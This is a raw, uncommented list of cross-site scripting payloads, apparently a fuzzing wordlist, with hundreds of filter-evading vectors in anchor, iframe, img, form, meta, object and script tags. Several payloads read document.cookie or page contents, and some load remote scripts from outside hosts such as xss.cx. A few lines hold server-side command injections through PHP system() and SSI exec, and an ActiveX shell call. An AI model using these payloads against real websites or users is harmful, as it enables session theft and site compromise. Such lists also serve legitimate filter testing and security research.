<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a> <a href=``calc``> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> <a href="data:text/html,%3cscript>confirm (1)</script>" >hello <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+">click</a> "/><a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a> <a href=``explorer.exe``> <a href="invalid:1" id=x name=y>test</a> "/><a href="invalid:2" id=x name=y>test</a> <a href="javascript:window['confirm'](1)">aa</a> <a href="jAvAsCrIpT:confirm(1)">X</a> <a href="jAvAsCrIpT:confirm(1)">X</a> <a href="javas	cri
pt:confirm(1)">test</a> <a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a> "/><a href=javascript:confirm(document.cookie)>Click Here</a> "><a href=javascript:confirm(document.cookie)>Click Here</a> <a href=javascript:confirm(document.cookie)>Click-XSS</a> "><a href="javascript:\u0061le%72t(1)"><button> <a href="javascript:\u0061le%72t(1)"><button> <a href="javascript:'hello'" rel="sidebar">x</a> <a href="javascript:void(0)" onmouseover=
javascript:confirm(1)
>X</a> <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a> <a href=``mspaint.exe``> <a href=``notepad.exe``> <a href=``shell:System``> <a href='vbscript:"\"&confirm(1)''"'> <a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script> <a href=``xss.cx``> <a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script> <a rel="noreferrer" href="//xss.cx">click</a> <a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a> <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( 
);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>; <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>; <a href=[�]"� onmouseover=prompt(1)//">XYZ</a about://xss.cx <a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a> <a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a> <a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello <a/href=java	script:confirm%28/XSS/%29>click</a> <a/href="javascript: javascript:prompt(1)"><input type="X"> <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B'>xss <a[\x0B]onmosemove=confirm('\Done\')> <a[\x0B]onmouseover=location=’jav\x41script\x3aconfirm\x28″ZDresearch”\x29′>ZDresearch <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 <body language=vbs onload=confirm-1 "><body language=vbs onload=window.location='http://xss.cx'> <body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> <body scroll=confirm(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <body/onload=<!-->
confirm(1)> <body/onload=<!-->
confirm(1)> "<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>" "\"><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>", <body/onload=<!-->
confirm(1);prompt(/XSS/.source)> ><body/onload=<!-->
confirm(1);prompt(/XSS/.source)> <button autofocus onfocus=confirm(2)> <button onclick="window.open('http://xss.cx/::Error138 ');">CLICKME "<button>'><img src=x onerror=confirm(0);></button>" <button>'><img src=x onerror=confirm(0);></button> charset=utf- '`"><*chr*script>log(*num*)</script> <command onmouseover="javascript:confirm(0);">Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button>?f <div contextmenu=x>right-click<menu id=x onshow=confirm(1)> <div id="confirm(2)" style="x:expression(eval)(id)"> <div onmouseover='confirm(1)'>DIV</div> <div onmouseover='confirm(1)'>DIV</div> <div style="color:rgb(''�x:expression(confirm(URL=1))"></div> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="confirm(1)">x</button> <%div%20style=xss:expression(prompt(1))> <div/onmouseover='confirm(1)'> style="x:"> <div/onmouseover='confirm(1)'> style="x:"> <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div> <div/style="width:expression(confirm(1))">X</div> <embed code="http://xss.cx/xss.swf" allowscriptaccess=always></embed> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.cx/xss.js></SCRIPT>'"--> exp/*<XSS STYLE='no\xss:noxss("*//*"); </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> 
for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); <form action='data:text/html,<script>confirm(1)</script>'><button>CLICK <form action='java	scri	pt:confirm(1)'><button>CLICK <form action="javas	cript:confirm(1)" method="get"><input type="submit" value="Submit"></form> <form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>confirm(1)</textarea><input type="submit" value="Absenden"></form> <form name=location > <form><a href="javascript:\u0061lert(1)">X <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit> <form/action=ja	vascr	ipt:confirm(document.cookie)><button/type=submit> <form/action=javascript:eval(setTimeout(confirm(1)))><input/type=submit> //<form/action=javascript:confirm(document.cookie)><input/type='submit'>// <form><button formaction=javascript:confirm(1)>CLICKME <form><iframe 	  src="javascript:confirm(1)" 	;> <form><input type=submit formaction=//xss.cx><textarea name=x> <form><isindex formaction="javascript:confirm(1)" <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <frameset><frame/src=//xss.cx> > > http://www.google<script .com>confirm(document.location)</script http://www.<script abc>setTimeout('confirm(1)',1)</script .com> http://www.<script>confirm(1)</script .com <!--[if WindowsEdition]><script>confirm(location);</script><![endif]--> <!--[if<img src=x:x onerror=confirm(5)//]--> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <iframe %00 src="	javascript:prompt(1)	"%00> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); confirm(Safe.get());</script> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Bconfirm%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <iframe src="" onmouseover="confirm(document.cookie)"> <iframe src="#" style=width:exp/**/ressi/**/on(confirm(1))> <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new 
XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src="data:D,<script>confirm(top.document.body.innerHTML)</script>"> <iframe src="data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E"></iframe> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <iframe srcdoc='<body onload=prompt(1)>'> <iframe srcdoc='<svg/onload=confirm(3)>'> <iframe srcdoc="<svg/onload=confirm(domain)>"> <iframe src="http://xss.cx?x=<iframe name=x></iframe>"></iframe><a href="http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script> <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <iframe src=javascript:confirm(document.location)> <iframe src="javascript:'<script src=http://xss.cx ></script>'"></iframe> "><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <iframe width=0 height=0 src="javascript:confirm(1)"> <iframe/%00/ src=javaSCRIPT:confirm(1) "><iframe%20src="http://google.com"%%203E iframe.contentWindow.location.constructor.prototype <iframe><iframe src=javascript:confirm(4)></iframe> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> <iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";> "><iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=confirm(1) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> "><iframe/src \/\/onload = prompt(1) <iframe/src \/\/onload = prompt(1) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <iframe/src="data:text/html,<svg onload=confirm(1)>"> /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> <iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'> <!--[if]><script>confirm(1)</script --> <img language=vbs src=<b onerror=confirm#1/1#> "><img src="/" =_=" title="onerror='prompt(1)'"> <img src="/" =_=" title="onerror='prompt(1)'"> <img src ?itworksonchrome?\/onerror = confirm(1) <img src ?itworksonchrome?\/onerror = confirm(1)??? “><img src= onerror=confirm(1)> <img src=//\ onload=confirm(1)> <img src=`%00`
 onerror=confirm(1)
 <img src=1 onerror=Function("aler"+"t(documen"+"t.domain)")()> "]<img src=1 onerror=confirm(1)> /#<img src=1 onerror=javascript:confirm(3)> <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))> <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> # "><img src=javascript:while([{}]);> <img src=javascript:while([{}]);> <img/ src//'onerror/''/=confirm(1)//'> <img src=test.jpg?value=">Yes, we are still inside a tag!"> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x on*chr*Error="javascript:log(*num*)"/> <img src=x onerror=URL='javascript:confirm(1)'> "\"><img src=\"x\" onerror=\"confirm(0)\"/>", ><img src=\"x\" onerror=\"confirm(0)\"/> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> <img src=x onerror='confirm(domain+/ -- /+cookie)'>"> "><img src=x onerror=confirm('x') />] "><img src=x onerror=confirm(1); ... "><img src=x onerror=prompt(1);> "><img src=x onerror=prompt(document.location);>#"><img src=x onerror=prompt(document.location);> "><img src=x onerror=prompt("xss");>#"><img src=x onerror=prompt("xss");> "><img src=x onerror=window.open('https://www.google.com/');> "<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>" "\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>", <img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))> ><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))> "<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>" <img src=x 
onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))> "/><img src=x onerror=x.onerror=prompt(0)> "\"/><img src=x onerror=x.onerror=prompt(0)>" "/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)> "\"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>" <![<img src=x:x onerror=`confirm(2)//`]--> <img src=xx: onerror=confirm(document.location)> "><img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script> <img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script> "<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>" "\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>", <img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)> ><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)> <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> <img src=`xx:xx`onerror=confirm(1)> <img src=`xx:xx`onerror=confirm(1)> <img/	  src=`~` onerror=prompt(1)> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> "<img/src=` onerror=confirm(1)>" <img/src=` onerror=confirm(1)> "><--`<img/src=` onerror=confirm(1)> --!> <--`<img/src=` onerror=confirm(1)> --!> <img/src=%00 id=confirm(1) onerror=eval(id) <img/src=`%00` /id=confirm(1) /onerror=eval(id) <img/src=`%00` onerror=this.onerror=confirm(1) <img/src=@  onerror = prompt('1') <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) <img/src=x alt=confirm(1) onmouseover=eval(alt)> <img/src=x alt=confirm(1) onmouseover=eval(alt)> "\"><imgsrc=x onerror=confirm.onerror=confirm(1)>", ><imgsrc=x onerror=confirm.onerror=confirm(1)> <img/src="x"/id="javascript"/name=":confirm"/alt="(1)"/onerror="eval(id + name + alt)"> 
=’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))> '><img/src="x:x"/onerror="confirm(1)"'>< innerHTML=document.title innerHTML=innerText <input autofocus onfocus=confirm(1)> <input formaction=JaVaScript:confirm(document.cookie)> <input id=x><input id=x><script>confirm(x)</script> <><input onfocus=confirm(0) autofocus <!-- <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!> <input type=hidden onformchange=confirm(1)/> <input type=hidden style=`x:expression(confirm(1))`> <input type=hidden style=`x:expression(confirm(4))`> <input type="text" name="a" <input type="text" value=`` <div/onmouseover='confirm(1)'>X</div> <input type="text" value=``<div/onmouseover='confirm(1)'>X</div> "><input value=<><iframe/src=javascript:confirm(1) <input value=<><iframe/src=javascript:confirm(1) input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> <input/onmouseover="javaSCRIPT:confirm(1)" <i/onclick=URL=name> "/><isindex action="javas	cript:confirm(1)" type=image> "><isindex action="javas	cript:confirm(1)" type=image> <isindex action="javas	cript:confirm(1)" type=image> <isindex action="javas	cript:confirm(document.cookie)" type=image> <isindex formaction=javascript:confirm(1)> <label class="<% confirm(1) %>"> <li style="color:rgb(''0,0,�javascript:expression(confirm(1))">XSS</li> <link rel="import" href="//xss.cx"> <link rel=import onerror=confirm(1)> <link rel="prefetch" href="http://xss.cx"> <link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' > <link%20rel="import"%20href="?bypass=<script>confirm(document.domain)</script>"> <listing><img src=x onerror=confirm(1)></listing> < < <a href="http://i.imgur.com/b7sajuK.jpg" download><a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a> <img src=xx:x 
onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script> <label class="<% confirm(1) %>"> </script><script>confirm(1)</script> <marquee onstart='javascript:confirm(1)'>^__^ "><marquee>confirm( `bypass :)`)</marquee> "<marquee/onstart=confirm(/XSS/.source);confirm(1)>" "\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>", <marquee/onstart=confirm(/XSS/.source);confirm(1)> ><marquee/onstart=confirm(/XSS/.source);confirm(1)> <math><a xlink:href="//jsfiddle.net/t846h/">click <math><a/xlink:href=javascript:confirm(1)>click <math><a/xlink:href=javascript:eval('\141\154\145\162\164\50\61\51')>X <meta charset="x-mac-farsi">¼script ¾confirm(1)//¼/script ¾ <meta content="
 1 
; JAVASCRIPT: confirm(1)" http-equiv="refresh"/> <meta http-equiv=refresh content="0 javascript:confirm(1)"> "><meta http-equiv="refresh" content="0;javascript:confirm(1)"/> <meta http-equiv="refresh" content="0;javascript:confirm(1)"/> <meta http-equiv="refresh" content="0;javascript:confirm(1)"/>? <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)> ?movieName=";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);// <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? "\"\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>" ><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>" <object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'> "><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? 
"/><object data=javascript:\u0061le%72t(1)> <object data=javascript:\u0061le%72t(1)> "/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object> "<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>" "><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>", <object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object> "/><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> /*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("http://xss.cx.js", function() { c(); });'>' "<option>'><button><img src=x onerror=confirm(0);></button></option>" <option>'><button><img src=x onerror=confirm(0);></button></option> "\"\/><option>'><button><img src=x onerror=confirm(1);></button></option>", ><option>'><button><img src=x onerror=confirm(1);></button></option> <p hidden?={{hidden}}>123</p> <p style="font-family:'foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))'"> ?param1=<script>prompt(9);/*¶m2=*/</script> $.parseHTML('<img src=xx:X onerror=confirm(1)>') <?php echo $_SERVER['PHP_SELF']?> </plaintext\></|\><plaintext/onmouseover=prompt(1) ?playerID=a\";))}catch(e){confirm(document.domain)}// ${@print(system($_SERVER['HTTP_USER_AGENT']))} ${@print(system(“whoami”))} <q/oncut=confirm() '/><q/oncut=open()>// <q/oncut=open()> >"><script>confirm('hi')</script>"<</a>value=""><script>confirm('hi')</script>"<"/> .replace(/.+/,eval)// <s "'"="" 000=""> "'"><s/000 "'"><s/000 "'"><s/000 "'"><s/000 <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t> <s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a> <sVg><scRipt %00>confirm(1) <<scr\0ipt/src=http://xss.cx/xss.js></script 
<scri%00ipt>confirm(0);</script> <scri%00pt>confirm(1);</scri%00pt> "<scri%00pt>confirm(0);</scri%00pt>" "\"><scri%00pt>confirm(0);</scri%00pt>", <scri%00pt>confirm(0);</scri%00pt> ><scri%00pt>confirm(0);</scri%00pt> <script>/* */confirm(1)/* */</script> <script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # <script> (function (o) { function exploit(x) { if (x !== null) confirm('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> <script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/ <script ~~~>confirm(0%0)</script ~~~> <script ^__^>confirm(String.fromCharCode(49))</script ^__^ '"`><script>/* **chr*log(*num*)// */</script> <script>/* **chr*/log(*num*)// */</script> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> <script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=> <script for=document 
event=onreadystatechange>getElementById('safe123').click()</script> <script itworksinallbrowsers>/*<script* */confirm(1)</script <script itworksinallbrowsers>/*<script* */confirm(1)</script ? <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> <script> logChr0x09(1); </script> <script src=>confirm(8)</script> "/><script src="data:text/javascript,confirm(1)"></script> <script src="data:text/javascript,confirm(1)"></script> "<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>" "\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>", <script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script> ><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script> <script type="text/xaml"><Canvas Loaded="confirm" /></script> <script> "\ud83d\u*hex4*".match(/.*<.*/) ? 
